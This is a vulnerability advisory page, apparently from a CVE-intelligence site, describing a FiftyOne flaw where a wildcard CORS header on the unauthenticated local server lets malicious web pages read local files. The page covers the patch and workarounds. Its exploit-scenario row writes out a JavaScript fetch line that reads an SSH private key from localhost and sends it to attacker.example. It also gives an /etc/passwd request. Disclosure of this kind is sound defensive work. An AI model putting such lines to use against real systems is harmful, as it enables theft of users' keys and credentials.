FiftyOne CVE-2026-53656
MEDIUMSeverity by source
AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Attack originates from a remote web page (AV:N); server is unauthenticated (PR:N); victim must visit a page (UI:R); read scope extends to local filesystem beyond server (S:C); arbitrary file read achievable (C:H).
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Impact
The FiftyOne App/API server (fiftyone/server/app.py) and the /media route (fiftyone/server/routes/media.py) unconditionally set a permissive CORS header (Access-Control-Allow-Origin: *) on their responses. Because the embedded App server runs locally and is unauthenticated, this allows any website a user visits to make cross-origin requests to that user's running FiftyOne server and read the responses.
Combined with the unauthenticated /media endpoint - which serves files from the local filesystem by path - the wildcard CORS policy turns a local-only file read into a remotely exploitable, drive-by data exfiltration vulnerability. A malicious web page can silently issue requests such as http://localhost:5151/media?filepath=/etc/passwd and read arbitrary files accessible to the server process (SSH keys, cloud credentials, .env files, dataset media, etc.), then exfiltrate them to an attacker-controlled endpoint.
The victim only needs to have a FiftyOne server running locally and visit a malicious page - no clicks or other interaction are required. Browsers that have shipped Private Network Access / local-network-access protections (e.g. Chromium 142+) mitigate this for some users, but Safari and Firefox do not yet, so the attack remains viable in common configurations.
Who is impacted: any user running FiftyOne (the open-source, embedded App server) locally while also browsing the web.
Not affected: media stored in cloud buckets, which is served via signed URLs on a separate origin.
Patches
Fixed in FiftyOne 1.17.0. The hard-coded Access-Control-Allow-Origin: * has been removed and the server now responds same-origin only by default, which covers local desktop usage and the supported notebook integrations (each served through a same-origin proxy or iframe).
Cross-origin access is now opt-in via a new allowed_origins config option (environment variable FIFTYONE_ALLOWED_ORIGINS), an explicit comma-separated list of trusted origins, e.g.:
export FIFTYONE_ALLOWED_ORIGINS='https://app.example.com,http://localhost:3000'The literal value * restores the legacy wildcard behavior for users who explicitly require it and emits a warning.
Users should upgrade to FiftyOne 1.17.0 or later.
Workarounds
In affected versions there is no configuration flag to disable the wildcard CORS header without upgrading. Until you can upgrade:
- Do not run the FiftyOne App server while browsing untrusted websites.
- Keep the App server bound to
localhost(the default) and avoid exposing it on a network interface. - Use a browser that enforces Private Network Access protections.
Resources
- OWASP A01:2025 - Broken Access Control: https://owasp.org/Top10/2025/A01_2025-Broken_Access_Control/
AnalysisAI
Drive-by local filesystem exfiltration in FiftyOne versions below 1.17.0 allows any malicious website to silently read arbitrary files from a victim's machine. The FiftyOne App server unconditionally returns Access-Control-Allow-Origin: * on all responses, and the unauthenticated /media endpoint serves local filesystem files by path - together these let JavaScript on any visited webpage fetch files such as SSH keys, cloud credentials, or .env files from localhost:5151 and relay them to an attacker-controlled server. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Two conditions must simultaneously hold: (1) the victim has a FiftyOne App server process actively running and bound to localhost (port 5151 by default), which is the normal operating state for any active FiftyOne user; and (2) the victim visits a malicious web page in a browser that does not enforce Private Network Access protections - specifically Safari or Firefox in any current release, or Chromium prior to version 142. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The vendor-assigned CVSS 3.1 score of 6.3 (Medium) uses AV:L, which warrants explicit scrutiny: the attack is initiated by a remote malicious web page, not by a locally-present adversary - making AV:N a more accurate characterization and raising the realistic severity to approximately 7.4 (High). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A data scientist has FiftyOne running on localhost:5151 while reviewing model outputs in Jupyter and simultaneously browsing the web. They navigate to a malicious page - such as a typosquatted PyPI documentation mirror or compromised forum - that silently executes fetch('http://localhost:5151/media?filepath=/home/user/.ssh/id_rsa').then(r=>r.text()).then(d=>fetch('https://attacker.example/collect?d='+btoa(d))). … |
| Remediation | Upgrade to FiftyOne 1.17.0 or later via pip install --upgrade fiftyone. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
The PDF reader in Mozilla Firefox before 39.0.3, Firefox ESR 38.x before 38.1.1, and Firefox OS before 2.2 allows remote
Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderb
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox b
The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbi
The crypto.generateCRMFRequest function in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird befo
An issue was discovered in the Cisco WebEx Extension before 1.0.7 on Google Chrome, the ActiveTouch General Plugin Conta
The XrayWrapper implementation in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 does not properly interact with
The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, Thunderbi
The Web IDL implementation in Mozilla Firefox before 28.0, Firefox ESR 24.x before 24.4, Thunderbird before 24.4, and Se
Mozilla Firefox before 28.0, Firefox ESR 24.x before 24.4, Thunderbird before 24.4, and SeaMonkey before 2.25 allow remo
The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and b
Same weakness CWE-346 – Origin Validation Error
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-q78p-hj9h-5466